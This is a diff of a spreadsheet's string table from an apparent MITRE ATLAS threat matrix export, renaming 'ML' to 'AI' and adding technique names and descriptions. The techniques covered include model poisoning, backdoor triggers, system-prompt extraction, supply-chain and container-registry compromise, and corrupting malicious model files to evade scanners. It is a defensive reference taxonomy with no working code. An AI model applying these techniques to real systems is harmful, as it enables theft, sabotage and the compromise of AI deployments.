-    <t>attack-pattern--541403a4-65af-4190-bea8-5d8a01454d13</t>
-  </si>
-  <si>
-    <t>attack-pattern--cf5dcf13-9ca9-475f-8544-eceae7503cdf</t>
-  </si>
-  <si>
-    <t>attack-pattern--8918438b-7422-4f85-b8c8-32d98b5439c6</t>
-  </si>
-  <si>
-    <t>attack-pattern--4a040cc9-d53d-4fa3-948d-a1ff8f02e0eb</t>
+    <t>attack-pattern--c7d79f0f-1c80-41d5-b6ef-3c1c53c34a06</t>
+  </si>
+  <si>
+    <t>attack-pattern--253d4b38-c3b2-4c21-9239-9193c0500316</t>
+  </si>
+  <si>
+    <t>attack-pattern--4bd0628d-3cdd-4411-9192-2af6c0f02287</t>
+  </si>
+  <si>
+    <t>attack-pattern--fd10d38b-4428-4701-aa6b-39bcf961ac6d</t>
+  </si>
+  <si>
+    <t>attack-pattern--cdf60b67-5511-42ba-b459-3aed5c3343f2</t>
+  </si>
+  <si>
+    <t>attack-pattern--911b49e8-556c-4ca9-9dad-39040ec216db</t>
+  </si>
+  <si>
+    <t>attack-pattern--eea9d0bf-847c-4120-bcfd-dc178b4c6649</t>
+  </si>
+  <si>
+    <t>attack-pattern--056e4ffe-e0da-46ec-8dee-628a2fecacd0</t>
+  </si>
+  <si>
+    <t>attack-pattern--4eb73819-e06c-46b1-8fe0-692be6af794d</t>
+  </si>
+  <si>
+    <t>attack-pattern--c3a26e3e-3220-422c-b4b4-3913820fe6cf</t>
+  </si>
+  <si>
+    <t>attack-pattern--a1c0328f-7d6b-431f-85a9-59d0bc15786d</t>
+  </si>
+  <si>
+    <t>attack-pattern--c63cb2b7-ad6f-4790-811d-5eca14caaec8</t>
+  </si>
+  <si>
+    <t>attack-pattern--056578e2-7e26-496a-9dcd-0c1d05084da7</t>
+  </si>
+  <si>
+    <t>attack-pattern--6001061b-5b84-4d5b-af1a-5a822c214184</t>
+  </si>
+  <si>
+    <t>attack-pattern--dbe22826-20b1-4dc5-897b-fdcf89ef3ee3</t>
+  </si>
+  <si>
+    <t>attack-pattern--a9da00c7-7328-4a16-afce-04d0cd4f7290</t>
+  </si>
+  <si>
+    <t>attack-pattern--eda10125-6f7d-479f-857a-19ef5d86a961</t>
+  </si>
+  <si>
+    <t>attack-pattern--7afa4546-4cc9-4495-acb7-41b61ffb7650</t>
+  </si>
+  <si>
+    <t>attack-pattern--c1ddecc2-a64a-4cd3-a3cb-cd295b829229</t>
+  </si>
+  <si>
+    <t>attack-pattern--c5e79835-2002-4513-8de3-edaa7c3c1a3c</t>
+  </si>
+  <si>
+    <t>attack-pattern--70660fc0-a4ba-4500-ac74-557fed97b06b</t>
+  </si>
+  <si>
+    <t>attack-pattern--f95077b3-b1e0-4f4f-9baf-c0bd2f25416c</t>
+  </si>
+  <si>
+    <t>attack-pattern--248bc7a1-0df9-41fc-aeb9-e267dc0577a9</t>
+  </si>
+  <si>
+    <t>attack-pattern--ed8d9393-d6b3-4df8-8a27-c9d97f64cbf5</t>
+  </si>
+  <si>
+    <t>attack-pattern--39d12ad5-28b3-4322-953e-d17ae74159cc</t>
+  </si>
+  <si>
+    <t>attack-pattern--b432a102-8ef6-4f76-8287-7d99c4bd5e39</t>
+  </si>
+  <si>
+    <t>attack-pattern--c05491e8-0c47-490d-8df3-26f7d4fdc629</t>
+  </si>
+  <si>
+    <t>attack-pattern--1038acd6-a2d0-4fb5-93e8-e1702964182d</t>
+  </si>
+  <si>
+    <t>attack-pattern--bd5c8094-54c8-45f6-82de-4ce8349fcd4a</t>
+  </si>
+  <si>
+    <t>attack-pattern--2096e516-cb52-4131-a73d-0ef139258e4c</t>
+  </si>
+  <si>
+    <t>attack-pattern--726a5898-ac81-4c62-b828-9f105556a907</t>
+  </si>
+  <si>
+    <t>attack-pattern--9923b6b4-84f1-4ab4-8ccf-4d597db61a57</t>
+  </si>
+  <si>
+    <t>attack-pattern--adf16819-dc11-46a7-b23a-0ea57ccc093c</t>
+  </si>
+  <si>
+    <t>attack-pattern--dd1eaf06-1454-407d-b988-fab91c43c4f7</t>
+  </si>
+  <si>
+    <t>attack-pattern--526f7326-7de2-43d1-96ea-ae85b7cde54e</t>
+  </si>
+  <si>
+    <t>attack-pattern--251922b0-0e89-485b-9d7b-a292232c00d7</t>
+  </si>
+  <si>
+    <t>attack-pattern--813ac9e1-b1b4-464b-8acf-ef10ac84c11e</t>
+  </si>
+  <si>
+    <t>attack-pattern--4e2eac6a-fa8c-4bf8-967e-fdc3638c0cf9</t>
+  </si>
+  <si>
+    <t>attack-pattern--b0b3327f-a064-4943-82b2-951fba172c6e</t>
+  </si>
+  <si>
+    <t>attack-pattern--0691cb6f-ab52-4219-bb75-88c7ef77f02e</t>
+  </si>
+  <si>
+    <t>attack-pattern--bf1b4fb5-5f17-42d1-ab74-b2b67f485f29</t>
+  </si>
+  <si>
+    <t>attack-pattern--59ab5025-ad52-4e07-8c5a-e47be578cee5</t>
+  </si>
+  <si>
+    <t>attack-pattern--6e6da90a-2d48-40cf-b27d-614360d96a1e</t>
+  </si>
+  <si>
+    <t>attack-pattern--c606cfab-fa3d-4608-b01e-5f20ba14be1b</t>
+  </si>
+  <si>
+    <t>attack-pattern--e5f71e81-5f3e-4a82-8e99-d911d3e912f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--dffdbcc7-6db6-45aa-bd7e-f3fb62781b1b</t>
+  </si>
+  <si>
+    <t>attack-pattern--493d8a7f-63a0-419a-a8c7-74f85f1afab0</t>
+  </si>
+  <si>
+    <t>attack-pattern--1a1d7e16-bb89-46dd-aa36-e65c9047bf28</t>
+  </si>
+  <si>
+    <t>attack-pattern--2243a101-6295-4b82-8075-0c287d602a0e</t>
+  </si>
+  <si>
+    <t>attack-pattern--46843164-cb30-4c02-bc73-10ae30c6082a</t>
+  </si>
+  <si>
+    <t>attack-pattern--2e4aefac-93e9-42bc-9f19-300111f5de70</t>
+  </si>
+  <si>
+    <t>attack-pattern--84295c1b-dfa5-44a8-bb1f-47dcd0915635</t>
+  </si>
+  <si>
+    <t>attack-pattern--7eeb9b48-ed18-4e84-80b5-35b8223e3cf9</t>
+  </si>
+  <si>
+    <t>attack-pattern--1da3c8bb-158a-4ce1-8a92-93b2dee4b9a9</t>
+  </si>
+  <si>
+    <t>attack-pattern--7ff2727f-a254-4323-b182-e050bf0db8b0</t>
+  </si>
+  <si>
+    <t>attack-pattern--21c89e42-5b62-4e44-b83d-33e0eebb1eed</t>
+  </si>
+  <si>
+    <t>attack-pattern--83120ec7-b57c-49c5-a595-95a6982dfce0</t>
+  </si>
+  <si>
+    <t>attack-pattern--5aa7eba8-9cd1-4d20-b6e6-81b1ec780c9c</t>
+  </si>
+  <si>
+    <t>attack-pattern--746aeca6-ef05-4cad-8b29-5677cf1aa6d9</t>
+  </si>
+  <si>
+    <t>attack-pattern--bf0aa41d-6932-48a8-a357-346ce7f15eef</t>
+  </si>
+  <si>
+    <t>attack-pattern--0663b3da-43ac-4328-ad18-8fedf7a11b7a</t>
+  </si>
+  <si>
+    <t>attack-pattern--d6c070bc-ed05-4f84-8ebc-48b2df8d1fac</t>
+  </si>
+  <si>
+    <t>attack-pattern--ef74d856-323e-47d9-ad54-1f2a9a91fcf6</t>
+  </si>
+  <si>
+    <t>attack-pattern--dea40e9d-00d1-48fd-b26e-1d307490596c</t>
+  </si>
+  <si>
+    <t>attack-pattern--0c7c0e15-6279-4b1d-9707-3ce1a4dd4bb2</t>
+  </si>
+  <si>
+    <t>attack-pattern--a920c087-f6ce-4d6f-b7b8-6b4bafc1c351</t>
+  </si>
+  <si>
+    <t>attack-pattern--010bee3b-b3ce-4ba7-b936-16e8b56c4b3e</t>
+  </si>
+  <si>
+    <t>attack-pattern--84dc16b9-496a-451e-9a3f-1a2d6c19adbe</t>
+  </si>
+  <si>
+    <t>attack-pattern--60a5a4d5-78b3-4da4-89bc-d69e99333652</t>
+  </si>
+  <si>
+    <t>attack-pattern--2562ad09-faa4-4cdf-b3fb-41bcf5e06b2f</t>
+  </si>
+  <si>
+    <t>attack-pattern--24a70892-6962-43aa-bd44-59409b4f2803</t>
+  </si>
+  <si>
+    <t>attack-pattern--aa9644dc-7314-4d43-b595-bf1aad275fe0</t>
+  </si>
+  <si>
+    <t>attack-pattern--559daa3f-d332-47b8-8f9e-b883732564b4</t>
+  </si>
+  <si>
+    <t>attack-pattern--502d0b4b-0e4b-4294-9d50-e01093f1c291</t>
+  </si>
+  <si>
+    <t>attack-pattern--2dff830e-5644-41e7-93ff-fd0552da77fe</t>
+  </si>
+  <si>
+    <t>attack-pattern--d9135863-13f5-4d54-9434-c24c29b75b15</t>
+  </si>
+  <si>
+    <t>attack-pattern--291f82aa-907f-4ff9-a984-f04c1ab369bd</t>
+  </si>
+  <si>
+    <t>attack-pattern--2b522145-c609-4950-a106-e8c416dd1b41</t>
+  </si>
+  <si>
+    <t>attack-pattern--e65ae421-3b6c-449e-979f-b450d55d7423</t>
+  </si>
+  <si>
+    <t>attack-pattern--3756561f-0794-4127-91db-76a227d0f322</t>
+  </si>
+  <si>
+    <t>attack-pattern--68ec4fb6-15df-4841-abdd-8e0cd8534520</t>
+  </si>
+  <si>
+    <t>attack-pattern--985c6a6f-cad4-4c6a-bf32-0c3c58d57519</t>
+  </si>
+  <si>
+    <t>attack-pattern--3b88e298-97d5-451d-bbf5-1b13f5a2ade2</t>
+  </si>
+  <si>
+    <t>attack-pattern--084cfcad-b515-4c14-b36a-d97ba9063850</t>
+  </si>
+  <si>
+    <t>attack-pattern--5f879def-5cd4-45d3-b330-b5642ec2f741</t>
+  </si>
+  <si>
+    <t>attack-pattern--2de4e5ad-3cd3-4e53-beb8-1809a5aad790</t>
+  </si>
+  <si>
+    <t>attack-pattern--e8053731-4b16-4dbc-89e7-90accdffc0fd</t>
+  </si>
+  <si>
+    <t>attack-pattern--66f96e17-ee2c-4e77-aeb2-08d4db84621a</t>
+  </si>
+  <si>
+    <t>attack-pattern--9ce7dbb0-5b4e-480c-bec7-b7db65a1ad97</t>
+  </si>
+  <si>
+    <t>attack-pattern--f31b06f2-9f55-4477-a7df-278c6ea9e2d8</t>
+  </si>
+  <si>
+    <t>attack-pattern--66169e1d-131b-41f6-8ab5-8603d8f7a03b</t>
+  </si>
+  <si>
+    <t>attack-pattern--382d0462-947d-4d13-94a9-8dccc130fbc3</t>
+  </si>
+  <si>
+    <t>attack-pattern--2eeed418-51b8-4243-aea6-c802a6220e30</t>
+  </si>
+  <si>
+    <t>attack-pattern--cf106628-da5b-47b7-950f-9658391857af</t>
+  </si>
+  <si>
+    <t>attack-pattern--2fd7ca0a-8ca1-44fa-852f-f68db00b756d</t>
+  </si>
+  <si>
+    <t>attack-pattern--9ff99618-2174-4826-87c5-05603723a0b2</t>
+  </si>
+  <si>
+    <t>attack-pattern--5c410f62-7a6b-4759-947d-18e110e0706c</t>
+  </si>
+  <si>
+    <t>attack-pattern--b1f3f9e9-0b83-430e-81e1-05f90612009e</t>
+  </si>
+  <si>
+    <t>attack-pattern--92eb716e-f0e3-47de-8693-107bbd9d6554</t>
+  </si>
+  <si>
+    <t>attack-pattern--34a1e3e5-aef6-466e-b7fd-83f958a5aa75</t>
+  </si>
+  <si>
+    <t>attack-pattern--2d916848-8a92-4aa7-9b08-e8d61fe7af1f</t>
+  </si>
+  <si>
+    <t>attack-pattern--d8d9c2c8-8537-4515-887a-69aa029bc1c6</t>
+  </si>
+  <si>
+    <t>attack-pattern--928e83ff-b63f-473f-a0d3-a20fd9b8e9c7</t>
+  </si>
+  <si>
+    <t>attack-pattern--34975325-8143-4099-8af1-f83de967d177</t>
+  </si>
+  <si>
+    <t>attack-pattern--459dc255-c7a4-4aef-ba10-0b402f66c694</t>
+  </si>
+  <si>
+    <t>attack-pattern--279383cb-aaac-480d-aa91-39d44da7cd55</t>
+  </si>
+  <si>
+    <t>attack-pattern--ec881f8c-1b0f-466d-abef-5e56521fcd93</t>
+  </si>
+  <si>
+    <t>attack-pattern--a9bc20bd-9f88-4794-8ff3-cfd86a2bc2ae</t>
+  </si>
+  <si>
+    <t>attack-pattern--581a34ca-98ae-4a6a-94eb-38b6a6f16b22</t>
+  </si>
+  <si>
+    <t>attack-pattern--45238ba0-2955-4ab7-b26f-c8892d32d86b</t>
+  </si>
+  <si>
+    <t>attack-pattern--67487920-42fd-43d6-86d9-52e683e64c19</t>
+  </si>
+  <si>
+    <t>attack-pattern--6259d6af-6e70-4597-a577-8e71f2a15af7</t>
+  </si>
+  <si>
+    <t>attack-pattern--c476cf85-34c6-4c06-a4b5-062bd6001b38</t>
+  </si>
+  <si>
+    <t>attack-pattern--fe2f48bd-5f4c-49a2-9e65-cbf2d2267b46</t>
+  </si>
+  <si>
+    <t>attack-pattern--e7df1199-39d9-4d35-bee7-5f7f8ef8f9cd</t>
+  </si>
+  <si>
+    <t>AI Artifact Collection</t>
+  </si>
+  <si>
+    <t>AI Development Workspaces</t>
+  </si>
+  <si>
+    <t>AI Intellectual Property Theft</t>
   </si>
   <si>
     <t>AI Model Inference API Access</t>
   </si>
   <si>
+    <t>AI Software</t>
+  </si>
+  <si>
+    <t>AI Supply Chain Compromise</t>
+  </si>
+  <si>
+    <t>AI-Enabled Product or Service</t>
+  </si>
+  <si>
     <t>Acquire Infrastructure</t>
   </si>
   <si>
-    <t>Acquire Public ML Artifacts</t>
+    <t>Acquire Public AI Artifacts</t>
   </si>
   <si>
     <t>Active Scanning</t>
   </si>
   <si>
-    <t>Adversarial ML Attack Implementations</t>
-  </si>
-  <si>
-    <t>Adversarial ML Attacks</t>
-  </si>
-  <si>
-    <t>Backdoor ML Model</t>
+    <t>Adversarial AI Attack Implementations</t>
+  </si>
+  <si>
+    <t>Adversarial AI Attacks</t>
   </si>
   <si>
     <t>Black-Box Optimization</t>
@@ -700,19 +781,28 @@
     <t>Citations</t>
   </si>
   <si>
+    <t>Cloud Service Discovery</t>
+  </si>
+  <si>
     <t>Command and Scripting Interpreter</t>
   </si>
   <si>
     <t>Consumer Hardware</t>
   </si>
   <si>
+    <t>Container Registry</t>
+  </si>
+  <si>
+    <t>Corrupt AI Model</t>
+  </si>
+  <si>
     <t>Cost Harvesting</t>
   </si>
   <si>
     <t>Craft Adversarial Data</t>
   </si>
   <si>
-    <t>Create Proxy ML Model</t>
+    <t>Create Proxy AI Model</t>
   </si>
   <si>
     <t>Data</t>
@@ -727,7 +817,7 @@
     <t>Datasets</t>
   </si>
   <si>
-    <t>Denial of ML Service</t>
+    <t>Denial of AI Service</t>
   </si>
   <si>
     <t>Develop Capabilities</t>
@@ -736,6 +826,15 @@
     <t>Direct</t>
   </si>
   <si>
+    <t>Discover AI Artifacts</t>
+  </si>
+  <si>
+    <t>Discover AI Model Family</t>
+  </si>
+  <si>
+    <t>Discover AI Model Ontology</t>
+  </si>
+  <si>
     <t>Discover AI Model Outputs</t>
   </si>
   <si>
@@ -745,55 +844,52 @@
     <t>Discover LLM System Information</t>
   </si>
   <si>
-    <t>Discover ML Artifacts</t>
-  </si>
-  <si>
-    <t>Discover ML Model Family</t>
-  </si>
-  <si>
-    <t>Discover ML Model Ontology</t>
-  </si>
-  <si>
     <t>Domains</t>
   </si>
   <si>
+    <t>Drive-by Compromise</t>
+  </si>
+  <si>
+    <t>Embed Malware</t>
+  </si>
+  <si>
+    <t>Erode AI Model Integrity</t>
+  </si>
+  <si>
     <t>Erode Dataset Integrity</t>
   </si>
   <si>
-    <t>Erode ML Model Integrity</t>
-  </si>
-  <si>
     <t>Establish Accounts</t>
   </si>
   <si>
-    <t>Evade ML Model</t>
+    <t>Evade AI Model</t>
+  </si>
+  <si>
+    <t>Exfiltration via AI Inference API</t>
   </si>
   <si>
     <t>Exfiltration via Cyber Means</t>
   </si>
   <si>
-    <t>Exfiltration via ML Inference API</t>
-  </si>
-  <si>
     <t>Exploit Public-Facing Application</t>
   </si>
   <si>
     <t>External Harms</t>
   </si>
   <si>
+    <t>Extract AI Model</t>
+  </si>
+  <si>
     <t>Extract LLM System Prompt</t>
   </si>
   <si>
-    <t>Extract ML Model</t>
-  </si>
-  <si>
     <t>False RAG Entry Injection</t>
   </si>
   <si>
     <t>Financial Harm</t>
   </si>
   <si>
-    <t>Full ML Model Access</t>
+    <t>Full AI Model Access</t>
   </si>
   <si>
     <t>Gather RAG-Indexed Targets</t>
@@ -805,19 +901,19 @@
     <t>Hardware</t>
   </si>
   <si>
+    <t>Impersonation</t>
+  </si>
+  <si>
     <t>Indirect</t>
   </si>
   <si>
     <t>Infer Training Data Membership</t>
   </si>
   <si>
-    <t>Inject Payload</t>
-  </si>
-  <si>
     <t>Insert Backdoor Trigger</t>
   </si>
   <si>
-    <t>Invert ML Model</t>
+    <t>Invert AI Model</t>
   </si>
   <si>
     <t>Journals and Conference Proceedings</t>
@@ -844,39 +940,33 @@
     <t>LLM Prompt Self-Replication</t>
   </si>
   <si>
+    <t>LLM Response Rendering</t>
+  </si>
+  <si>
     <t>LLM Trusted Output Components Manipulation</t>
   </si>
   <si>
-    <t>ML Artifact Collection</t>
-  </si>
-  <si>
-    <t>ML Development Workspaces</t>
-  </si>
-  <si>
-    <t>ML Intellectual Property Theft</t>
-  </si>
-  <si>
-    <t>ML Software</t>
-  </si>
-  <si>
-    <t>ML Supply Chain Compromise</t>
-  </si>
-  <si>
-    <t>ML-Enabled Product or Service</t>
-  </si>
-  <si>
     <t>Malicious Package</t>
   </si>
   <si>
+    <t>Manipulate AI Model</t>
+  </si>
+  <si>
     <t>Manual Modification</t>
   </si>
   <si>
+    <t>Masquerading</t>
+  </si>
+  <si>
     <t>Model</t>
   </si>
   <si>
     <t>Models</t>
   </si>
   <si>
+    <t>Modify AI Model Architecture</t>
+  </si>
+  <si>
     <t>Obtain Capabilities</t>
   </si>
   <si>
@@ -889,7 +979,7 @@
     <t>Physical Environment Access</t>
   </si>
   <si>
-    <t>Poison ML Model</t>
+    <t>Poison AI Model</t>
   </si>
   <si>
     <t>Poison Training Data</t>
@@ -916,16 +1006,22 @@
     <t>Retrieval Content Crafting</t>
   </si>
   <si>
+    <t>Reverse Shell</t>
+  </si>
+  <si>
     <t>Search Application Repositories</t>
   </si>
   <si>
+    <t>Search Open AI Vulnerability Analysis</t>
+  </si>
+  <si>
+    <t>Search Open Technical Databases</t>
+  </si>
+  <si>
     <t>Search Victim-Owned Websites</t>
   </si>
   <si>
-    <t>Search for Publicly Available Adversarial Vulnerability Analysis</t>
-  </si>
-  <si>
-    <t>Search for Victim's Publicly Available Research Materials</t>
+    <t>Serverless</t>
   </si>
   <si>
     <t>Societal Harm</t>
@@ -934,7 +1030,7 @@
     <t>Software Tools</t>
   </si>
   <si>
-    <t>Spamming ML System with Chaff Data</t>
+    <t>Spamming AI System with Chaff Data</t>
   </si>
   <si>
     <t>Spearphishing via Social Engineering LLM</t>
@@ -943,6 +1039,9 @@
     <t>Special Character Sets</t>
   </si>
   <si>
+    <t>Stage Capabilities</t>
+  </si>
+  <si>
     <t>System Instruction Keywords</t>
   </si>
   <si>
@@ -952,13 +1051,13 @@
     <t>Technical Blogs</t>
   </si>
   <si>
-    <t>Train Proxy via Gathered ML Artifacts</t>
+    <t>Train Proxy via Gathered AI Artifacts</t>
   </si>
   <si>
     <t>Train Proxy via Replication</t>
   </si>
   <si>
-    <t>Unsafe ML Artifacts</t>
+    <t>Unsafe AI Artifacts</t>
   </si>
   <si>
     <t>Unsecured Credentials</t>
@@ -982,9 +1081,40 @@
     <t>White-Box Optimization</t>
   </si>
   <si>
+    <t>Adversaries may collect AI artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [AI Attack Staging](/tactics/AML.TA0001).
+AI artifacts include models and datasets as well as other telemetry data produced when interacting with a model.</t>
+  </si>
+  <si>
+    <t>Developing and staging AI attacks often requires expensive compute resources.
+Adversaries may need access to one or many GPUs in order to develop an attack.
+They may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations.
+Multiple workspaces may be used to avoid detection.</t>
+  </si>
+  <si>
+    <t>Adversaries may exfiltrate AI artifacts to steal intellectual property and cause economic harm to the victim organization.
+Proprietary training data is costly to collect and annotate and may be a target for [Exfiltration](/tactics/AML.TA0010) and theft.
+AIaaS providers charge for use of their API.
+An adversary who has stolen a model via [Exfiltration](/tactics/AML.TA0010) or via [Extract AI Model](/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.</t>
+  </si>
+  <si>
     <t>Adversaries may gain access to a model via legitimate access to the inference API.
-Inference API access can be a source of information to the adversary ([Discover ML Model Ontology](/techniques/AML.T0013), [Discover ML Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade ML Model](/techniques/AML.T0015), [Erode ML Model Integrity](/techniques/AML.T0031)).
+Inference API access can be a source of information to the adversary ([Discover AI Model Ontology](/techniques/AML.T0013), [Discover AI Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade AI Model](/techniques/AML.T0015), [Erode AI Model Integrity](/techniques/AML.T0031)).
 Many systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.</t>
+  </si>
+  <si>
+    <t>Most AI systems rely on a limited set of AI frameworks.
+An adversary could get access to a large number of AI systems through a comprise of one of their supply chains.
+Many AI projects also rely on other open source implementations of various algorithms.
+These can also be compromised in a targeted way to get access to specific systems.</t>
+  </si>
+  <si>
+    <t>Adversaries may gain initial access to a system by compromising the unique portions of the AI supply chain.
+This could include [Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the AI [AI Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.
+In some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.</t>
+  </si>
+  <si>
+    <t>Adversaries may use a product or service that uses artificial intelligence under the hood to gain access to the underlying AI model.
+This type of indirect model access may reveal details of the AI model or its inferences in logs or metadata.</t>
   </si>
   <si>
     <t>Adversaries may buy, lease, or rent infrastructure for use throughout their operation.
@@ -997,16 +1127,15 @@
 Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify machine learning artifacts.
-These machine learning artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters.
+    <t>Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify AI artifacts.
+These AI artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters.
 An adversary will be particularly interested in artifacts hosted by or associated with the victim organization as they may represent what that organization uses in a production environment.
-Adversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](/techniques/AML.T0003) or [Search for Victim's Publicly Available Research Materials](/techniques/AML.T0000)).
-These ML artifacts often provide adversaries with details of the ML task and approach.
-ML artifacts can aid in an adversary's ability to [Create Proxy ML Model](/techniques/AML.T0005).
+Adversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](/techniques/AML.T0003) or [Search Open Technical Databases](/techniques/AML.T0000)).
+These AI artifacts often provide adversaries with details of the AI task and approach.
+AI artifacts can aid in an adversary's ability to [Create Proxy AI Model](/techniques/AML.T0005).
 If these artifacts include pieces of the actual model in production, they can be used to directly [Craft Adversarial Data](/techniques/AML.T0043).
 Acquiring some artifacts requires registration (providing user details such email/name), AWS keys, or written requests, and may require the adversary to [Establish Accounts](/techniques/AML.T0021).
-Artifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.
-</t>
+Artifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.</t>
   </si>
   <si>
     <t xml:space="preserve">An adversary may probe or scan the victim system to gather information for targeting.
@@ -1014,19 +1143,12 @@
 </t>
   </si>
   <si>
-    <t>Adversaries may search for existing open source implementations of machine learning attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial ML attacks as part of their attack.</t>
+    <t>Adversaries may search for existing open source implementations of AI attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial AI attacks as part of their attack.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may develop their own adversarial attacks.
-They may leverage existing libraries as a starting point ([Adversarial ML Attack Implementations](/techniques/AML.T0016.000)).
+They may leverage existing libraries as a starting point ([Adversarial AI Attack Implementations](/techniques/AML.T0016.000)).
 They may implement ideas described in public research papers or develop custom made attacks for the victim model.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may introduce a backdoor into a ML model.
-A backdoored model operates performs as expected under typical conditions, but will produce the adversary's desired output when a trigger is introduced to the input data.
-A backdoored model provides the adversary with a persistent artifact on the victim system.
-The embedded vulnerability is typically activated at a later time by data samples with an [Insert Backdoor Trigger](/techniques/AML.T0043.004)
 </t>
   </si>
   <si>
@@ -1036,7 +1158,7 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy ML Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) they have full access to and are representative of the target model.
+    <t xml:space="preserve">In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy AI Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) they have full access to and are representative of the target model.
 The adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples.
 If the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another.
 This means that an attack that works for the proxy models will likely then work for the target model.
@@ -1047,6 +1169,12 @@
     <t>Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data.</t>
   </si>
   <si>
+    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]
+For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]
+Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.
 There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.
 Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.
@@ -1058,21 +1186,26 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may target different machine learning services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization.
-Sponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversarial data are inputs to a machine learning model that have been modified such that they cause the adversary's desired effect in the target model.
+    <t>An adversary may compromise a victim's container registry by pushing a manipulated container image and overwriting an existing container name and/or tag. Users of the container registry as well as automated CI/CD pipelines may pull the adversary's container image, compromising their AI Supply Chain. This can affect development and deployment environments.
+Container images may include AI models, so the compromised image could have an AI model which was manipulated by the adversary (See [Manipulate AI Model](/techniques/AML.T0018)).</t>
+  </si>
+  <si>
+    <t>An adversary may purposefully corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner. The corrupt model may still successfully execute malicious code before deserialization fails.</t>
+  </si>
+  <si>
+    <t>Adversaries may target different AI services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization.
+Sponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.</t>
+  </si>
+  <si>
+    <t>Adversarial data are inputs to an AI model that have been modified such that they cause the adversary's desired effect in the target model.
 Effects can range from misclassification, to missed detections, to maximizing energy consumption.
 Typically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary's intended effect.
-For example, an adversarial input for an image classification task is an image the machine learning model would misclassify, but a human would still recognize as containing the correct class.
+For example, an adversarial input for an image classification task is an image the AI model would misclassify, but a human would still recognize as containing the correct class.
